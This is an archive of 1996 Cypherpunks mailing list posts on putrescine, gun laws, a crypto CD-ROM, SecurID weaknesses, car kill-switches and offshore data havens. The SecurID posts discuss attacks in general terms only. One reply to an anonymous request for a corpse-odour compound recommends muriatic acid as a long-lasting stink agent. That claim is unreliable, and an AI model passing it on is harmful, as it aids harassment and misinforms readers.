Message-ID: <2.2.32.19960810173024.00610fe8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 AM 8/10/96 -0700, you wrote:
>Is there such a chemical compound as putracine ( maybe not correctly
spelled ) which emulates the extreme odor of rotting corpses ? If so where
can I find out how to make it ?
>
>

Why make putracine when you can just buy it? You would be amazed at what you
can order from chemical supply companies. But I would recommend muriatic
acid instead as it is more persistant -- a couple drops will last for months
(sources say).

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Aug 1996 03:29:19 +0800
To: cypherpunks@toad.com
Subject: Re: Chemistry question please ..
Message-ID: <199608101736.KAA02222@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 AM 8/10/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Is there such a chemical compound as putracine ( maybe not correctly spelled 
) which emulates the extreme odor of rotting corpses ?

Yes.  The proper spelling is putrescine.  There's also another one called 
"cadaverine."  And yet another called "skatole."   ("scatology")

>If so where can I find out how to make it ?

Not on cypherpunks.  If you want to know more, communicate with me directly. 
 Use a penet-like remailer if you want...


 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Aug 1996 14:34:08 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
Message-ID: <ae328685020210048a43@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM 8/10/96, Hallam-Baker wrote:
>Sandy Sandfort wrote:
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                           SANDY SANDFORT
>>  In addition
>> to the "exceptions," there was no penalty for violation of the
>> law, thus making sure it was unenforceable.  It was not a case
>> of "pro-gun fascism" but of rough American political humor.  At
>> the very least it kept the city council out of more serious
>> mischief.
>
>Was there a bar against a person obtaining an injunction to
>force someone to purchase a gun or a provision providing that
>no liabilities would be incurred as a result of not owning one?
>
>The law is much too important to start abusing to make political
>points.

This, of course, was my exact point. I don't buy the argument that Kennesaw
(or whatever) was just making a symbolic point. If one community passes a
law which mandates the ownership of guns, in contravention to the Second
Amendment, then another community could ban ownership of guns, using the
same logic and "general principal."

(Several have, of course. I think such laws violate the Second Amendment,
but apparently the courts do not agree.)

And what of making a "citizen's arrest" of a "perp" who refuses to own a
gun. I prefer not to have to guess which laws are real and which are merely
posturing.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Weimer <bromill@deltanet.com>
Date: Sun, 11 Aug 1996 13:32:28 +0800
To: aba@atlas.ex.ac.uk
Subject: Where can I get the public key?
In-Reply-To: <24700.9608101234@exe.dcs.exeter.ac.uk>
Message-ID: <320CD954.7042@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


aba@atlas.ex.ac.uk wrote:
> 
> I'm downloading things to put on the CDROM that Remo Pini
> <rp@rpini.com> is organising.  (I'm doing the downloading because I
> have better net connect than Remo, I'll simply forward my downloads on
> a gold CD; it's Remo's CD, he will add things, structure, re-organise,
> junk sections etc).
> 
> If there is anything that anyone thinks is a must have please let me
> know, or email it to me.  (PGP keys on keyserver, either encrypt to me
> (0x556A4A67) or Remo Pini (0x33F9B4E9), if it's encrypted to Remo, I'll
> just forward it on the CD for Remo's consideration).
> 
> Please check that it is not already on the ftp site below.
> 
> So far I am part way through a complete dump of (including all the
> mirrors):
> 
>         ftp://idea.sec.dsi.unimi.it/pub/crypt
> 
> here's the top level directory:
> 
> drwxr-xr-x   3 root     root        1024 Jan 30  1996 LUC
> drwxr-xr-x   2 510      root        3072 Aug 10 09:31 PGP
> -rwxr-xr-x   1 root     root        1579 Sep  2  1994 README
> drwxr-xr-x   2 root     root         512 Jan 30  1996 SKIP
> drwxr-xr-x   2 root     root        3072 Jan 30  1996 applied-crypto
> drwxr-xr-x   3 root     root        2048 Feb  2  1996 bignum
> drwxr-xr-x   2 root     root       10752 Jul 12 09:13 code
> drwxr-xr-x  27 root     root        1024 Jun 19 23:01 cypherpunks
> drwxr-xr-x   2 root     root        4096 Jan 30  1996 docs
> drwxr-xr-x   6 root     root        1536 Jul 29 23:02 ftp.demon-PGP
> drwxr-xr-x  13 root     root         512 Aug  7 23:15 ftp.funet.fi-crypto
> drwxr-xr-x   2 root     root         512 Aug  6 23:10 ftp.informatik-PGP
> drwxr-xr-x   2 root     root         512 Apr 18 23:02 ftp.informatik-disk#
> drwxr-xr-x   2 root     root         512 Jan 30  1996 ftp.mantis-cryptography
> drwxr-xr-x   8 root     root         512 Jun  4 23:28 ftp.ox.ac.uk
> drwxr-xr-x   5 root     root         512 Aug  1 08:28 ftp.pgp.net
> drwxr-xr-x   7 root     root         512 Jun  5 23:47 ftp.psy-Crypto
> drwxr-xr-x   2 root     staff        512 Apr  1 09:21 kerberos
> drwxr-xr-x   2 root     root         512 Jan 30  1996 libdes
> drwxr-xr-x   2 root     root         512 Mar 23 15:37 math
> drwxr-xr-x   9 root     root         512 Jan 30  1996 rpub.cl.msu.edu
> drwxr-xr-x  15 root     root        1024 Jan 30  1996 rsa.com
> 
> (Amazing collection they have btw, the cypherpunks mirror seems to be
> very up-to-date, some files just three days old... what is this,
> automated ITAR violation?)
> 
> 118Mb and counting...
> 
> I'll be doing this today (and tomorrow if it takes that long), and
> hopefully blowing a gold CD monday.  (Before anyone notices I've
> clobbered 600Mb of disk space, hopefully).
> 
> Adam
> 
> Key for user ID: Adam Back <aba@dcs.ex.ac.uk>
> 1024-bit key, Key ID 556A4A67, created 1993/06/08
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2i
> 
> mQCNAiwUXUEAAAEEAJnWEHE3juLAyMnEt3hrID3t8tblJvJPfoPz4Plg+2a5y4HA
> TonXBomkhm8hrRu1umruUUaeW1mxIbpvP413a2JyU7pdyfyoFVpWW5iT9pXYOgSW
> 65d+5GWe4g4PLrSbJZPBFIezd8xddnx5+5hbRk1K6UpfReQuOynIuJ1VakpnAAUT
> tBxBZGFtIEJhY2sgPGFiYUBkY3MuZXguYWMudWs+iQCVAgUQMC4WlX47g+7S34A9
> AQGJ3wP9Fwcooqg1/3MYFrfbMoqGydE60ypaCXBIM8Zypqhx+64ap8FhkANqW1jx
> ltQMC7ZHhPiWMpNtWEGWcWFnqytyVIvGv8nuBGmiUrPJnMPWAsHTwl2tJ5WpYdPf
> xQRLfN5eWrjW8Ps5fQHKziBrE0HAK9FcuZ51fSBH4ulmd/2kO9+JARUDBRAv4EaG
> sVcwSRahJGUBARF3CACOs/Z1IpyKJqLswf979RbvfpCzi4r2vuzKdfFE+NBV7x0m
> m13v3Eldf/5Z5WByZ36SQjxUhIxqMdaVQafaS5oiQZrmy31K6IyAJxQwdPNZ+pAd
> AeASm9q1IjYIb0+As6QWdePYP9jRrHESHkDgmJANnAcU+OL9pbrqjdwIYPW1rvpI
> 58VCiCvQ2v/A9Lq+R4opwQ3rz4lX9/7qDnWfBe2pcaorQXAuXLSGEba/H4HUKvIr
> OnW3jcQzK2lebxKRDduwFOMTnrcpnRVLn21NSukYsOU1WZ4valwIFGUt88hcO8Ki
> f0liCzFqfvfbLPdtW/hqS/v5ukuI+y017xb3H8vWiQCVAwUQL9gNKSnIuJ1Vakpn
> AQHH6AP/T7dwXid03U7UM2/QzU+y6F4kHrGBuvJcyJewWbEb16ItkMngjzXP47kx
> gZygR4MWXsyQlvE2inSYzRJ3L+6ftaPvX8JsvVCll7JIejfmNGZYSWw9E/vPi/ls
> aa+pN3WqPxnzpwr8PL6b8w1fZZ47antgdZlOXgGO+hRbWV7zPcc=
> =iFuA
> -----END PGP PUBLIC KEY BLOCK-----
> 
> Key for user ID: Remo Pini <rp@rpini.com>
> 2048-bit key, Key ID 33F9B4E9, created 1996/07/14
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQENAzHpRlsAAAEIANgw4sEL9idlZxO8UBYPluxSXI5tkDSpGAc5EfxeGsrnesEs
> hnfhT7uQfr2M7mdY3BIvOVGj672m+1c0Bv4jO6E56uUaElS5uaf/rpd0lRdKNwnv
> zokSprnUEOnXy8ZgtOqws97/I4J7gkvjhu9QJGj2CnHduQ4De1Q63kwVHuySJWvX
> ecPBpV8XYrYkXumPJ6L/aBnnc/mT0ZVtKszoh/IHTq3dub/cWzShLBasmcIsIjDe
> ZjAoxjGkN5t1fSpuUWIkzv0rIOdBNZaEYmVnhj6Q8BkrEep+3KsycJsJi3dr0Pk8
> n/lPu8fD9VnpO2uMRFQVBx4vYCMkEWHLmzP5tOkABRG0GFJlbW8gUGluaSA8cnBA
> cnBpbmkuY29tPokBFQMFEDHpRlsRYcubM/m06QEBgwcIAI24HElAY2JED5PJ78ct
> R46RNWjMGQ5phP6ugE/xZzeW5zscHZChu1r8cdf+usl/qrTDPazYhcIfgiNwovdl
> ofvt/X5vDvlFMFqvlXB6O8x09eGWXjfS/5Wo9O4wPSEPv66CGHQ0q8pZsxtboyNH
> +eeYxqhSA03MDg5iWx5kakT2ShRv21oCwEZBTN8XOO4hRnfamIvOt5F8v3ypJZli
> w7xM398Dl0fATmNSVFiJp+l/c/+uNFLlyBU9Dp/m1w2nXXVmbVtTSJN0p4cZZ4WB
> 1FsNhH8yj+JURr2OtqKeZLDQz88bIiw/nawJB8mvNAr6bml5GxgCi91f9l6xYeb5
> ryQ=
> =UhcC
> -----END PGP PUBLIC KEY BLOCK-----
This encryption starting to bug.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zach Babayco <zachb@netcom.com>
Date: Sun, 11 Aug 1996 05:03:11 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Cybergangs?
In-Reply-To: <01I81T5ESZKS9JD3MN@mbcl.rutgers.edu>
Message-ID: <Pine.3.89.9608101116.A7553-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 8 Aug 1996, E. ALLEN SMITH wrote:

> 
> >CYBERGANGS
> >The head of the gang task force for the Arizona Department of Public Safety
> >reports that a Web site established in Detroit offers a how-to guide for
> >gangster wannabes and is urging gang members everywhere to unite under its
> >umbrella to form the first cyberspace gang.  The official says:  "Now it's
> >in your home, your living room, your den... Unfortunately, these guys can
> >talk about anything they want and there's nothing law enforcement can do
> >about it."  (Atlanta Journal-Constitution 8 Aug 96 F3)
> 
> 	Umm... yes, it's called free speech. While organizational ability
> might be a matter for concern, somehow I doubt that having them on the net
> will do any real damage... being on a computer that mine is connected to hardly
> puts them "in [my] home," even if my computer at home were connected to a phone
> line. Bloody law enforcement paranoids...
> 	-Allen
> 

Besides, its not at all threatening.  Actually, more on the stupid side.  
All it is right now is a several pages of trash-talk and a few links.  
Hardly a threat to life as we know it.  The URL, for anyone whos 
interested, is http://www.geocities.com/SunsetStrip/3149 (across town 
from my page, thankfully :)


Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 11 Aug 1996 01:56:17 +0800
To: pjb@ny.ubs.com (Paul J. Bell)
Subject: Re: SecurID
In-Reply-To: <9608091601.AA02324@sherry.ny.ubs.com>
Message-ID: <199608101711.MAA25776@homeport.org>
MIME-Version: 1.0
Content-Type: text


Paul J. Bell wrote:

| someone at my firm is about to press the securid system down our collective
| throats. please point me to the recent thread on this subject, and/or point
| me to some url's or the like, or to someone who has some firsthand knowledge
| of the pitfalls and/or vulnerbilities of secirid.

	www.l0pht.com/~mudge/skey_white_paper.html has many attacks
which will work on securid as well as s/key.

	The software is slow.  The Ace/Server calculates expected
values of information by running stuff through des & f2.  This is
slow.  It also encrypts the logs, which can be slow.  I've found that
a sparc 2 can die under the load of 2 people running sdlogmon, one
running sdadmin, and 2 or 3 people trying to authenticate.  (This
seems to be bad design, since the Sparc2 has hardware des in it, which
they don't take advantage of.

	The software is not the most bug free.  I'll flame at length
about the fact that you can't get source to fix the bugs yourselves.
I looked into hacking in a new des library (shared libraries are great
sometimes) to fix the slowness problem, but without source it turned
out to be more effort than buying a faster machine.

	You're stuck with their hardware.  With some other systems,
that use open standards, and you might be able to switch card vendors.
With SD, you must buy new cards from them every three years.  (SD
claims that their cards have a much higher failure rate after three
years, and that this is a feature.)

	You're stuck with their software.  SD libraries must be on every
machine that they authenticate for.  You can't bugfix those libraries,
even if you replace things like sdshell (an analouge of skeysh).
(sdshell, incidentally, munges wtmp on solaris machines because it
doesn't use the right library calls.)  This also means that you can't
run on unusual machines, like a BeBox.

	There are of course more fundamental things, like the fixed
length authentication code, the lack of peer review on the hash
algorithims, and the lack of ongoing authentication.  Also, I have a
few cryptographic attacks on the system which I hope to present at
Crypto's rump session, and I'll put on the web afterwards.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Aug 1996 05:19:09 +0800
To: Timothy Lawrence Nali <cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <199608101912.MAA05720@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 PM 8/10/96 -0400, Timothy Lawrence Nali wrote:
>Excerpts from internet.cypherpunks: 10-Aug-96 Police prepare stunning
>end.. by Gary Howland@systemics.c 
>
>[stuff about police wanting a new "stun gun" that can disable a car's
>electrical systems deleted] 

>
>1) You just noticed that your car is stolen.
>2) You call the XXX security company to report your car as stolen.
>3) The company beams down a signal by satellite/pager/cell-phone/etc. 
>   telling the car's security systems that the car has been stolen.
>4) This signal instructs the car to disable itself (shut down the engine, 
>   lock the doors, etc.) and, via a GPS module and built-in 
>   cell-phone/pager/etc., transmit it's coordinates.
>5) The car is recovered and everyone is happy.
>
>Of course, once such systems are widespread, the XXX security company
>will be "encouraged" to cooperate with local police and send that
>shut-down signal to any car the police tell them to.

"Car-Key-Escrow"?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 10 Aug 1996 22:14:04 +0800
To: cypherpunks@toad.com
Subject: RLR_lsl
Message-ID: <199608101223.MAA26370@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-96, NYP: 
 
   Peter Steinfels, religion columnist, compares the 
   "religious right" with the "life-style left," and examines 
   how the perjoratives are employed to oversimplify and 
   stigmatize -- an example of the pitfall A. Mehta has 
   critiqued on Cypherpunks: "binary thinking." 
 
      The real opposite number to the religious right is the 
      life-style left, which includes people who are religious 
      and people who are not. It includes some welfare-state 
      liberals and some anti-government libertarians. 
 
      What unites the life-style left is the belief that In 
      regard to the widest possible range of basic choices 
      about how to live, the state should refrain from 
      exerting its influence. The more basic the question, the 
      less the role of the state. 
 
   ----- 
 
   http://jya.com/rlrlsl.txt  (7 kb) 
 
   RLR_lsl 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 11 Aug 1996 02:18:23 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: F2 hash?
In-Reply-To: <v02130503ae313d72ccb8@[206.243.160.206]>
Message-ID: <199608101729.MAA25805@homeport.org>
MIME-Version: 1.0
Content-Type: text


Vin McLellan wrote:

|         John and I took Mudge out for dinner right after that speech. He
| told us then that he had inadvertently misspoken when he blamed his
| temporary silence on SDTI's lawyers. The real problem, he said, was with
| bullying lawyers from two corporate clients he is now under contract to in
| his day job.

|         Mudge is deeply involved in analyzing the ACE client/server code
| for weakness; he too is also very interested in the F2 algorithm -- which
| he felt involves too much knowable information as input to the hash -- and,
| of course (like Shimomura, the self-styled Threat of the West,) Mudge is
| stolidly pounding away at the SecurID itself to retrieve and cryptoanalyze
| the algorithm that hashes Current Time and the token's secret key to
| generate a SecurID token-code.

|         All the recent effort to bust the decade-old SecurID algorithm and
| the ACE network protocol seem a little anachronistic, of course.  I suppose
| it's kind of a grand salute to an old security warhorse (and SecurIDs are
| still the first line of defense in most Fortune 500 companies.)  There has
| been no formal announcement, but -- as J=FCri suggested -- I think most of
| the ACE/SecurID user community expects that both the network protocol and
| the token's internal algorithm will be upgraded sometime in the very near
| future.  (On a timeline SDTI established several years ago.)  And any new
| ACE protocol will inevitably establish a stateful session for the
| authentication exchange -- which will make the current generation of race
| attacks historical novelties.

	I'm not sure I buy this claim.  The problem of syncronising
multiple geographically seperate servers is tough.  Its actually
easier with challenge-response tokens, since you can simply have
servers issue different challenges when they lose contact.  (Mudge has
a clever similar hack for the current version of securids.)

|         SDTI Engineering (and most likely RSA Labs) have probably been
| banging away at the new design for a long time.  RSA was deeply involved
| with SDTI long before their recent merger;  RSA helped develop the F2 hash
| that is used in the ACE client/server security protocol.  (It's this F2
| hash that "Anonymous" is begging some Cypherpunk to steal,
| reverse-engineer, and publish for everyone to play with.  Bad, bad,
| commercial crypto!  Wouldn't want anyone to make money off strong
| cryptography, would we??)

	No, I (possibly unlike anonymous) want lots of people to make
shitloads of money of strong crypto.  I intend to do so.  But strong
crypto is published crypto, not trade secrets.  SDTI should be in the
business of selling the best code and most sturdy cards to work with
their protocols, which should be publically open to review.  I can't
confirm my attacks without knowing F2*, and without knowing if the
attacks work, I'm reluctant to publish.  So, I think I'll publish
based on what SDTI has published, which may or may not be correct.  (I
have told Mark Warner and Chris McNeil (?) of SDTI about the attacks,
and will discuss their responses.

	*I'm not the one who asked for F2 to be published.  I have
told many people about my attacks, and its concievable that someone
else found the same things.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sun, 11 Aug 1996 05:50:04 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Data Havens in Anguilla About to End?
In-Reply-To: <ae321e2b0402100474e7@[205.199.118.202]>
Message-ID: <199608101956.MAA02623@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> "Pulled by our Anguilla provider."

	Note that the taxbomber site is moving to a provider in the US.

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Timothy Lawrence Nali <tn0s+@andrew.cmu.edu>
Date: Sun, 11 Aug 1996 03:33:25 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <199608101504.RAA03459@internal-mail.systemics.com>
Message-ID: <Mm3AQMW00iWS01lKNa@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 10-Aug-96 Police prepare stunning
end.. by Gary Howland@systemics.c 

[stuff about police wanting a new "stun gun" that can disable a car's
electrical systems deleted] 

> Three questions come to mind:
>  
>         Will old fashioned engines be outlawed?
>         Will the "stun guns" be outlawed?
>         Will susceptible electronic systems become mandatory?
>         (and if so, why not just put a remote control switch in all cars?)

That last one may already be true.  I don't know about automotive
electronic systems, but there's a nice sticker on the back of my
computer that states the following:

        This device complies with the FCC, part 15 rules.
        Operation is subject to the following two conditions:
        1)  This device may not cause harmful interference.
        2)  This device must accept any interference received,
            including interference that may cause undesired operation.

And as for remote controls in all cars, that's not as far fetched as one
may think.  Watch for this in the form of car alarm/security systems. 
Imagine the following scenrio:

1) You just noticed that your car is stolen.
2) You call the XXX security company to report your car as stolen.
3) The company beams down a signal by satellite/pager/cell-phone/etc. 
   telling the car's security systems that the car has been stolen.
4) This signal instructs the car to disable itself (shut down the engine, 
   lock the doors, etc.) and, via a GPS module and built-in 
   cell-phone/pager/etc., transmit it's coordinates.
5) The car is recovered and everyone is happy.

Of course, once such systems are widespread, the XXX security company
will be "encouraged" to cooperate with local police and send that
shut-down signal to any car the police tell them to.

_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sun, 11 Aug 1996 00:24:03 +0800
To: cypherpunks@toad.com
Subject: cpunks CDROM suggestions anyone?
Message-ID: <24700.9608101234@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



I'm downloading things to put on the CDROM that Remo Pini
<rp@rpini.com> is organising.  (I'm doing the downloading because I
have better net connect than Remo, I'll simply forward my downloads on
a gold CD; it's Remo's CD, he will add things, structure, re-organise,
junk sections etc).

If there is anything that anyone thinks is a must have please let me
know, or email it to me.  (PGP keys on keyserver, either encrypt to me
(0x556A4A67) or Remo Pini (0x33F9B4E9), if it's encrypted to Remo, I'll
just forward it on the CD for Remo's consideration).

Please check that it is not already on the ftp site below.

So far I am part way through a complete dump of (including all the
mirrors):

	ftp://idea.sec.dsi.unimi.it/pub/crypt

here's the top level directory:

drwxr-xr-x   3 root     root        1024 Jan 30  1996 LUC
drwxr-xr-x   2 510      root        3072 Aug 10 09:31 PGP
-rwxr-xr-x   1 root     root        1579 Sep  2  1994 README
drwxr-xr-x   2 root     root         512 Jan 30  1996 SKIP
drwxr-xr-x   2 root     root        3072 Jan 30  1996 applied-crypto
drwxr-xr-x   3 root     root        2048 Feb  2  1996 bignum
drwxr-xr-x   2 root     root       10752 Jul 12 09:13 code
drwxr-xr-x  27 root     root        1024 Jun 19 23:01 cypherpunks
drwxr-xr-x   2 root     root        4096 Jan 30  1996 docs
drwxr-xr-x   6 root     root        1536 Jul 29 23:02 ftp.demon-PGP
drwxr-xr-x  13 root     root         512 Aug  7 23:15 ftp.funet.fi-crypto
drwxr-xr-x   2 root     root         512 Aug  6 23:10 ftp.informatik-PGP
drwxr-xr-x   2 root     root         512 Apr 18 23:02 ftp.informatik-disk#
drwxr-xr-x   2 root     root         512 Jan 30  1996 ftp.mantis-cryptography
drwxr-xr-x   8 root     root         512 Jun  4 23:28 ftp.ox.ac.uk
drwxr-xr-x   5 root     root         512 Aug  1 08:28 ftp.pgp.net
drwxr-xr-x   7 root     root         512 Jun  5 23:47 ftp.psy-Crypto
drwxr-xr-x   2 root     staff        512 Apr  1 09:21 kerberos
drwxr-xr-x   2 root     root         512 Jan 30  1996 libdes
drwxr-xr-x   2 root     root         512 Mar 23 15:37 math
drwxr-xr-x   9 root     root         512 Jan 30  1996 rpub.cl.msu.edu
drwxr-xr-x  15 root     root        1024 Jan 30  1996 rsa.com

(Amazing collection they have btw, the cypherpunks mirror seems to be
very up-to-date, some files just three days old... what is this,
automated ITAR violation?)

118Mb and counting... 

I'll be doing this today (and tomorrow if it takes that long), and
hopefully blowing a gold CD monday.  (Before anyone notices I've
clobbered 600Mb of disk space, hopefully).

Adam

Key for user ID: Adam Back <aba@dcs.ex.ac.uk>
1024-bit key, Key ID 556A4A67, created 1993/06/08

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAiwUXUEAAAEEAJnWEHE3juLAyMnEt3hrID3t8tblJvJPfoPz4Plg+2a5y4HA
TonXBomkhm8hrRu1umruUUaeW1mxIbpvP413a2JyU7pdyfyoFVpWW5iT9pXYOgSW
65d+5GWe4g4PLrSbJZPBFIezd8xddnx5+5hbRk1K6UpfReQuOynIuJ1VakpnAAUT
tBxBZGFtIEJhY2sgPGFiYUBkY3MuZXguYWMudWs+iQCVAgUQMC4WlX47g+7S34A9
AQGJ3wP9Fwcooqg1/3MYFrfbMoqGydE60ypaCXBIM8Zypqhx+64ap8FhkANqW1jx
ltQMC7ZHhPiWMpNtWEGWcWFnqytyVIvGv8nuBGmiUrPJnMPWAsHTwl2tJ5WpYdPf
xQRLfN5eWrjW8Ps5fQHKziBrE0HAK9FcuZ51fSBH4ulmd/2kO9+JARUDBRAv4EaG
sVcwSRahJGUBARF3CACOs/Z1IpyKJqLswf979RbvfpCzi4r2vuzKdfFE+NBV7x0m
m13v3Eldf/5Z5WByZ36SQjxUhIxqMdaVQafaS5oiQZrmy31K6IyAJxQwdPNZ+pAd
AeASm9q1IjYIb0+As6QWdePYP9jRrHESHkDgmJANnAcU+OL9pbrqjdwIYPW1rvpI
58VCiCvQ2v/A9Lq+R4opwQ3rz4lX9/7qDnWfBe2pcaorQXAuXLSGEba/H4HUKvIr
OnW3jcQzK2lebxKRDduwFOMTnrcpnRVLn21NSukYsOU1WZ4valwIFGUt88hcO8Ki
f0liCzFqfvfbLPdtW/hqS/v5ukuI+y017xb3H8vWiQCVAwUQL9gNKSnIuJ1Vakpn
AQHH6AP/T7dwXid03U7UM2/QzU+y6F4kHrGBuvJcyJewWbEb16ItkMngjzXP47kx
gZygR4MWXsyQlvE2inSYzRJ3L+6ftaPvX8JsvVCll7JIejfmNGZYSWw9E/vPi/ls
aa+pN3WqPxnzpwr8PL6b8w1fZZ47antgdZlOXgGO+hRbWV7zPcc=
=iFuA
-----END PGP PUBLIC KEY BLOCK-----

Key for user ID: Remo Pini <rp@rpini.com>
2048-bit key, Key ID 33F9B4E9, created 1996/07/14

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzHpRlsAAAEIANgw4sEL9idlZxO8UBYPluxSXI5tkDSpGAc5EfxeGsrnesEs
hnfhT7uQfr2M7mdY3BIvOVGj672m+1c0Bv4jO6E56uUaElS5uaf/rpd0lRdKNwnv
zokSprnUEOnXy8ZgtOqws97/I4J7gkvjhu9QJGj2CnHduQ4De1Q63kwVHuySJWvX
ecPBpV8XYrYkXumPJ6L/aBnnc/mT0ZVtKszoh/IHTq3dub/cWzShLBasmcIsIjDe
ZjAoxjGkN5t1fSpuUWIkzv0rIOdBNZaEYmVnhj6Q8BkrEep+3KsycJsJi3dr0Pk8
n/lPu8fD9VnpO2uMRFQVBx4vYCMkEWHLmzP5tOkABRG0GFJlbW8gUGluaSA8cnBA
cnBpbmkuY29tPokBFQMFEDHpRlsRYcubM/m06QEBgwcIAI24HElAY2JED5PJ78ct
R46RNWjMGQ5phP6ugE/xZzeW5zscHZChu1r8cdf+usl/qrTDPazYhcIfgiNwovdl
ofvt/X5vDvlFMFqvlXB6O8x09eGWXjfS/5Wo9O4wPSEPv66CGHQ0q8pZsxtboyNH
+eeYxqhSA03MDg5iWx5kakT2ShRv21oCwEZBTN8XOO4hRnfamIvOt5F8v3ypJZli
w7xM398Dl0fATmNSVFiJp+l/c/+uNFLlyBU9Dp/m1w2nXXVmbVtTSJN0p4cZZ4WB
1FsNhH8yj+JURr2OtqKeZLDQz88bIiw/nawJB8mvNAr6bml5GxgCi91f9l6xYeb5
ryQ=
=UhcC
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Sun, 11 Aug 1996 00:19:19 +0800
To: cypherpunks@toad.com
Subject: Re: secret sharing protocol: FLUFFED
Message-ID: <9608101310.AA24007@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



OK, before you rush to tell me...

Generating random shares doesn't work.

Different selections of 10 out of 15 shareholders
will arrive at different secrets.

I've got a fix in mind, and I'll chew it over for at least
a week before it reaches a keyboard.


 Peter Allan  peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sun, 11 Aug 1996 06:06:41 +0800
To: cypherpunks@toad.com
Subject: Chemistry question please .. (fwd)
Message-ID: <m0upKAv-00004EC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Sat, 10 Aug 1996 08:53:09 -0700
> To: cypherpunks@toad.com
> From: anonymous-remailer@shell.portal.com
> Subject: Chemistry question please ..
> 
> Is there such a chemical compound as putracine ( maybe not correctly spelled ) which emulates the extreme odor of rotting corpses ? If so where can I find out how to make it ?
> 

See Neal Stephenson's novel "Zodiac".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Aug 1996 17:40:26 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <ae32ba0103021004a3cd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I have respect for what Vince did, by actually moving to the Caribbean and
setting up a data haven/offshore ISP business. However, just as we discuss
the situation about remailers going down, or monitoring the cleartext, or
blocking certain addresses, so too should we discuss what Vince is choosing
to do. Maybe he is ultimately right, maybe not. I'm including this preface
just so no one thinks I'm trying to start a feud. No way.)


At 12:53 AM 8/11/96, Vincent Cate wrote:
>Taxbomber wrote:
>>This is the work of some journalist hacks who did a major job of
>>character assassination by claiming that we (and our provider)
>>were involved in selling fake passports.
>
>This is a fraud by taxbomber.  He is totally involved with selling fake
>passports.  He calls them "camouflage passports" and they have names like
>"British Honduras" of countries that no longer exist, or never did.  He
